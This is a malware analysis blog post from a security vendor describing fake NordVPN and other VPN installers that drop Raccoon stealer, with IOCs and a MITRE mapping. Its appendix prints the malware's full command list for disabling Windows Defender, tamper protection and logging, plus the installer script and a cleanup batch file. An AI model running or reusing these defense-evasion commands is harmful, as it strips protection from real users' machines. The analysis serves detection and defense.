Insights and Research

Threat Actors Distribute Malicious VPN Apps Masquerading as Popular Vendors

Cover image

Introduction

In May 2021, Zscaler ThreatLabZ observed several new domains registered by a threat actor for distribution of spoofed and malicious versions of popular VPN softwares. Threat actors have shifted their tactics, techniques, and procedures (TTPs) to target VPN users over the past year, taking advantage of the increase in remote work and the popularity of VPN applications.

We observed this particular actor spoofing VPN applications, such as NordVPN, F-secure Freedom VPN, Avast Secureline VPN, and Hotspot Shield, to distribute the infostealer known as Raccoon stealer. Several lookalike websites containing malicious download links were hosted on domains registered by the actor in May 2021 using the Njalla domain hosting provider.

Njalla has been used in the past by advanced persistent threat (APT) actors, such as Lazarus and Sandworm. ThreatLabZ closely monitors the network infrastructure used by these threat actors, which led to the discovery of this campaign.

For this blog, we performed a deep-dive technical analysis of the malicious setup files, the evasion techniques used, and the final payload delivered.

 

Attack flow

The attack starts when users visit a lookalike website registered by the threat actor to distribute VPN applications. As an example, the domain: vpnnords[.]com was registered by the attacker and used to host the webpage as shown in Figure 1. This page looks almost identical to the homepage of the legitimate NordVPN website. The only difference is that the “Download Free” button on this page leads to the download of a malicious NordVPN setup file hosted on a file-sharing website.

The complete list of domains registered by the attacker to target VPN users is included in the IOCs section.

Figure 1

Figure 1: Malicious webpage that looks similar to the legitimate NordVPN website

Download link of setup file: hxxps://filetransfer[.]io/data-package/tZCy19qQ/download

The downloaded file looks like a legitimate setup file of NordVPN—it uses the same file icon and even displays the graphical user interface (GUI) of NordVPN—but performs malicious activities in the background, which we describe in detail in the technical analysis section.

 

Low detection by security vendors

All the domains used in this attack and registered by the threat actor have no detection on VirusTotal and all security vendors mark these domains as clean.

One such example is shown in Figure 2.

Figure 2

Figure 2: No detection for the malicious domain(s) on VirusTotal by security vendors

This highlights how this attack has been flying under the radar and the importance of proactive hunting techniques, which helped us discover these domains.

 

Technical analysis

For the purpose of technical analysis, we will consider the file with the MD5 hash: e157f55aff49fe53befa3484d5e2b575

 

Static analysis

Similar to the legitimate NordVPN setup file, the fake NordVPN setup is packaged using Inno Installer, but the file structure inside the package is different. Figure 3 below shows the file structure for both legit and fake setup.

Figure 3

Figure 3: File structure for Inno-packaged fake and legitimate NordVPN setup files

 

[+] Inside the fake installation package

As shown in Figure 3 above, the package contains the following files.

  • Legitimate NordVPN setup – NordVPNSetup.exe. The NordVPNSetup.exe is the latest version of NordVPN with MD5 hash: 4e6183906dfe035954ec0260c573ab03
  • Seven files for performing different malicious operations. These files are described in more detail in the “Component analysis” section
  • The Inno package installer script – install_script.iss. All the files inside the package are encrypted using a password as defined in the [Setup] section of the installer script

Note: The Inno package installer script for the fake NordVPN setup is available in the appendix section

 

[+] Component analysis

In this section, we perform a technical analysis of the individual components packaged inside the malicious setup file.

Naming convention of component files

All the script (VBS and BAT) file components in this package follow a naming convention. The first few characters indicate the purpose of the script followed by an array of random characters appended to it.

Example:

# STRT indicates starting or initialization

STRTbbbn7przuvwav4hbpbps.vbs  = “STRT”  + “bbbn7przuvwav4hbpbps” + “.vbs”

# AVD indicates AV disable

AVDbbbn7i3b4ho55ck6raahj.bat = “AVD” + “bbbn7i3b4ho55ck6raahj” + “.bat”

# DEL indicates delete the components and cleanup

DELbbbn7l3bnchd166d2hhhv.bat = “DEL” + “bbbn7l3bnchd166d2hhhv” + “.bat”

 

VBScript analysis

MD5 hash: b5d6f5e514757d7b075ed59d79b8f2e2
Filename: STRTbbbn7przuvwav4hbpbps.vbs 

This VBScript is big in size because of the inclusion of junk instructions, which declare a lot of variables that are not used anywhere in the code.

After cleaning up, the script looks like shown in Figure 4.

Figure 4

Figure 4: Cleaned up VBScript.

The main purpose of this script is to execute the three BAT files, described in the next section. The VBScript creates a delay between the execution of each BAT script using a random delay parameter, calculated as follows.

Dim max,min
max=9890
min=4890
Dim RNDM
Randomize
RNDM=((max)*Rnd+min)

 

BAT files analysis

[Component #1: Disable security softwares]

MD5 hash: 7924178f4a19db114e1fbb2764b8b409
Filename: AVDbbbn7i3b4ho55ck6raahj.bat 

This BAT file is mainly responsible for disabling security software on the machine. It specifically targets Windows Defender and Exploit Guard. To disable the security service features, it leverages reg.exe to alter the Windows registry keys specific to Windows Defender and Exploit Guard.

In addition, the file disables system services and scheduled tasks related to Windows Defender.

Similar to the VBS file, this BAT file is large. This is because long strings of Base64-encoded data are included in the file and the commands are inserted between them, as shown in Figure 5.

Figure 5

Figure 5: Commands inserted between Base64-encoded blobs in the BAT file

The complete list of commands executed by this BAT file to disable security services and features is included in Appendix.

[Component #2: Main]

MD5 hash: b3a6b11fcf113f692648bc8f0f3f898e 
Filename: main.bat

This BAT file uses a byte order mark (BOM) in the first two bytes, in which it displays only Unicode characters when the file is opened using Notepad++ or any other text editor.

The first two bytes are {0xFF 0xFE} as shown in Figure 6.

Figure 6

Figure 6: Byte order mark (BOM) inserted in first two bytes of the BAT file

Once we delete these two bytes, we can view the contents successfully with a text editor, such as Notepad++, as shown in Figure 7.

Figure 7

Figure 7: Cleaned BAT file

The main actions performed by this BAT file are:

1. Creates a temp directory called "extracted" in the current directory
2. Renames the encrypted file.bin to file.zip
3. Decrypts and extracts the contents of file.zip using the password: "___________7876pwd4897pwd19506___________"
4. Extracts all the components after decrypting and renames file.zip to file.bin
5. Executes sihost.exe

After further analysis, we discovered that an open-source anti-antivirus obfuscator was used to package the files. This obfuscator will generate a BAT file and package everything using 7zip to create an encrypted and password-protected, multilayer archive file.

This GitHub project was used by the threat actor: https://github.com/hXR16F/AntiAV

In our case, the archive file is called file.bin

MD5 hash: b2880d44773178644ff13d755e96d5e2
FIlename: file.bin

This is an encrypted ZIP archive that, when decrypted, with the password “___________7876pwd4897pwd19506___________” contains the following main components:

AntiAV.data
Sihost.exe - 32-bit .NET Binary

[Component #3: Cleanup]

MD5 hash: 228c709d87e5ff50e7d5c05b1a7f6c03
Filename: DELbbbn7l3bnchd166d2hhhv.bat

Deletes all the components that were used in the initialization stage of the setup.

@echo off
timeout /T 60 /NOBREAK > Nul
Del /f /q "AVDbbbn7i3b4ho55ck6raahj.bat"
Del /f /q "STRTbbbn7przuvwav4hbpbps.vbs"
Del /f /q "STR2bbbn7przuvwav4hbpbps.vbs"
Del /f /q "7z.dll"
Del /f /q "7z.exe"
Del /f /q "main.bat"
Del /f /q "file.bin"
Del /f /q "LODbbbn7pkeaxe7obg0ydlex.bat"
Del /f /q "DELbbbn7l3bnchd166d2hhhv.bat"


Dynamic analysis

When the Inno packaged fake NordVPN setup is executed, it extracts the legitimate NordVPN setup file to the path: "%ProgramFiles%\" or "%ProgramFiles(x86)%\", while all the malicious operation-related files are extracted to the path "%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\".

As per the [Run] section of the installer Inno script, the legitimate NordVPN setup is executed first, followed by the malicious VBScript execution. Operating in this order prevents the end-user from suspecting that any malicious activity is being performed on the user's machine.

Figure 8 below shows the installation window that is displayed to the end-user as a result of legitimate NordVPN setup execution, while the malicious activity is being performed in the background. 

Figure 8

Figure 8: Installation window shown to the end-user

[+] .Net binary analysis

As described earlier, the VBS and BAT scripts' execution finally results in dropping and executing the .NET binary with the name, sihost.exe. Similar to all the payloads in the infection chain, the .NET binary is obfuscated and consists of multiple layers that make binary analysis difficult and help to bypass the AV products.

// Main binary

The main binary has the project name “StarEggControl”. On execution, it loads the next layer binary, which is stored as an image in the resource section with the full resource path “StarEggControl.frmSolucao2.image1” and it is constructed using individual pixel information from the stored image. The code responsible for binary construction is shown in Figure 9 below. 

Figure 9

Figure 9: Image to binary construction using individual pixels 

Once the binary construction is complete, the binary is loaded as a runtime module. The module is a .NET DLL with the name SampleUI.dll. Code execution is transferred to this DLL by calling SampleUI.MDI class with three parameters:

ugz1: "54776F5061746873" – Encoded resource name for next layer binary
ugz3: "59596A6F71" – Encoded key which is used to decrypt the next layer binary
projname: “StarEggControl” – Project name of main .NET binary

// SampleUI.dll

Similar to the previous layer, the SampleUI.dll also loads the next layer binary, which is stored as a bitmap image inside the resources of the main binary itself. The resource name when decoded using the parameter ugz1 is: "TwoPaths" and the full resource path is:  “StarEggControl.Resources.TwoPaths”

The next-layer binary is constructed from the retrieved Bitmap image using a custom algorithm implementation that uses XOR operation. The XOR key is derived using the parameter ugz3 which turns out to be "YYjoq"

The constructed binary is again loaded as a runtime module, which is also a .NET DLL with the name “公jrxl的A太 wCe”. Code execution is transferred to the DLL by calling the class with the name: “公jrxl的A太 wCe.d司J物rU族家的v行是o.z官司C生bqT的A”.

Please note that the class and method names inside the .NET binary contain Unicode characters to deter the process of static analysis and reverse engineering.

Figure 10 below shows the code flow for binary construction, loading, and transfer of code execution.

Figure 10

Figure 10: Decoding the bitmap to binary and transferring execution

// 公jrxl的A太 wCe

This is the final layer, which is responsible for loading and executing the main malware payload of the infection chain. The malware payload is stored among the resources of this final layer DLL with the resource name “ifF3K”. Like previous layers, the main malware payload is present in encrypted form.

Executing further, the malware payload is decrypted, a new suspended version of the main .NET binary sihost.exe is created, and the malware payload is injected into the suspended process using the Hollow Process Injection technique.

The injected malware payload is the well-known information stealer known as Raccoon stealer.
 

Similar builds but different themes

Pivoting on the package build, we found more than 500 samples (more than 50% of these samples have less than 10 detections) and two additional themes being used to deliver malware payload—one was related to multimedia applications and the other to security softwares. We have not confirmed whether the Raccoon stealer is the final payload for all the samples, but they seem similar to the current attack.

 

Zscaler Cloud Sandbox report

Figure 11

Figure 11: Zscaler Cloud Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.

- HTML.MalURL.NordVPN

- Win32.PWS.Raccoon

 

MITRE ATT&CK TTP mapping

 

ID

Tactic

Technique

T1566

Phishing

Attacker hosted fake websites leading to malicious file download

T1204.002

User Execution: Malicious File

User executes the downloaded file

T1140

Deobfuscate/Decode Files or Information

Strings and other data are obfuscated in the payloads

T1027.002

Obfuscated Files or Information: Software Packing

Payloads are packed in layers

T1070.004

Indicator Removal on Host: File Deletion

Deletes all the components which were used in the initialization stage

T1055.012

Process Injection: Process Hollowing

Use hollow process injection technique to execute the final malware payload

T1562

Impair Defenses

Disables Windows Defender features and log audits

T1124

System Time Discovery

One of Raccoon capabilities

T1087

Account Discovery

One of Raccoon capabilities

T1124

File and Directory Discovery

One of Raccoon capabilities

T1057

Process Discovery

One of Raccoon capabilities

T1012

Query Registry        

One of Raccoon capabilities

T1113

Screen Capture

One of Raccoon capabilities

T1082

System Information Discovery

One of Raccoon capabilities

T1016

System Network Configuration Discovery

One of Raccoon capabilities

T1573.001

Encrypted Channel: Symmetric Cryptography

One of Raccoon capabilities

 

 

Indicators of compromise

Hashes

 

MD5

Description

e157f55aff49fe53befa3484d5e2b575

NordVPNsetup.exe

b5d6f5e514757d7b075ed59d79b8f2e2

STRTbbbn7przuvwav4hbpbps.vbs

7924178f4a19db114e1fbb2764b8b409

AVDbbbn7i3b4ho55ck6raahj.bat

b3a6b11fcf113f692648bc8f0f3f898e

main.bat

228c709d87e5ff50e7d5c05b1a7f6c03

DELbbbn7l3bnchd166d2hhhv.bat

b2880d44773178644ff13d755e96d5e2

file.bin

0d2acc1da9ea3c2f98bcbc3ce872beb7

Raccoon Stealer

 

// Few other VPN  packages

 

MD5Description
67516c2a72880e674795b0a9a1edcb36FSecureFreedomeVPN.exe
fabc80d1a8c2c580f04550c34247e24davast_vpn_online_setup.x64.exe

 

Malicious domains

vpnnords[.]com
nordsfreevpn[.]com
nordsecure[.]click
vpn-nord[.]net

Dropped files

%ProgramFiles%\NordVPNSetup.exe 
OR 
%ProgramFiles(x86)%\NordVPNSetup.exe

%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.exe
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.dll
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\file.bin
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\main.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\sihost.exe
 

Appendix

// install_script.iss from fake NordVPN Inno package

;InnoSetupVersion=6.0.0 (Unicode)

[Setup]
AppName=SZUCiTYOSZUCiTYO IJiEalgWu
AppId=SZUCiTYOSZUCiTYO IJiEalgWu
AppVersion=44.9.9.9440
AppPublisher=EalgWuSZUCiTYOIJi EalgWu
DefaultDirName={autopf}
OutputBaseFilename=NordVPNSetup
Compression=lzma
; Encryption=yes
; PasswordHash=b525fbe0090152aa48b9e832d1c72bdc48e94461
; PasswordSalt=702a76b833fdb38f
Uninstallable=no
DisableDirPage=yes
DisableProgramGroupPage=yes
WizardImageFile=embedded\WizardImage0.bmp
WizardSmallImageFile=embedded\WizardSmallImage0.bmp

[Files]
Source: "{app}\NordVPNSetup.exe"; DestDir: "{app}"; MinVersion: 0.0,6.0; Flags: deleteafterinstall ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.exe"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.dll"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\file.bin"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\main.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 

[Run]
Filename: "{app}\NordVPNSetup.exe"; Description: "{cm:LaunchProgram,SZUCiTYOSZUCiTYO IJiEalgWu}"; MinVersion: 0.0,6.0; Flags: postinstall skipifsilent nowait
Filename: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; Description: "{cm:LaunchProgram,Generator}"; MinVersion: 0.0,6.0; Flags: shellexec nowait

[CustomMessages]
default.NameAndVersion=%1 version %2
default.AdditionalIcons=Additional shortcuts:
default.CreateDesktopIcon=Create a &desktop shortcut
default.CreateQuickLaunchIcon=Create a &Quick Launch shortcut
default.ProgramOnTheWeb=%1 on the Web
default.UninstallProgram=Uninstall %1
default.LaunchProgram=Launch %1
default.AssocFileExtension=&Associate %1 with the %2 file extension
default.AssocingFileExtension=Associating %1 with the %2 file extension...
default.AutoStartProgramGroupDescription=Startup:
default.AutoStartProgram=Automatically start %1
default.AddonHostProgramNotFound=%1 could not be located in the folder you selected.%n%nDo you want to continue anyway?

[Languages]
; These files are stubs
; To achieve better results after recompilation, use the real language files
Name: "default"; MessagesFile: "embedded\default.isl"; 

// Commands executed to disable system security services

reg  add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f"
reg  delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f"
reg  add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f"
reg  add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f"
reg  delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f"
reg  delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f"
reg  delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f"
reg  delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f"
reg  delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f"

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

reg  add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f"

// Altering scheduled tasks on the machine related to security services.

schtasks  /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
 

Stay up to date with the latest digital transformation tips and news.

By submitting the form, you are agreeing to our privacy policy.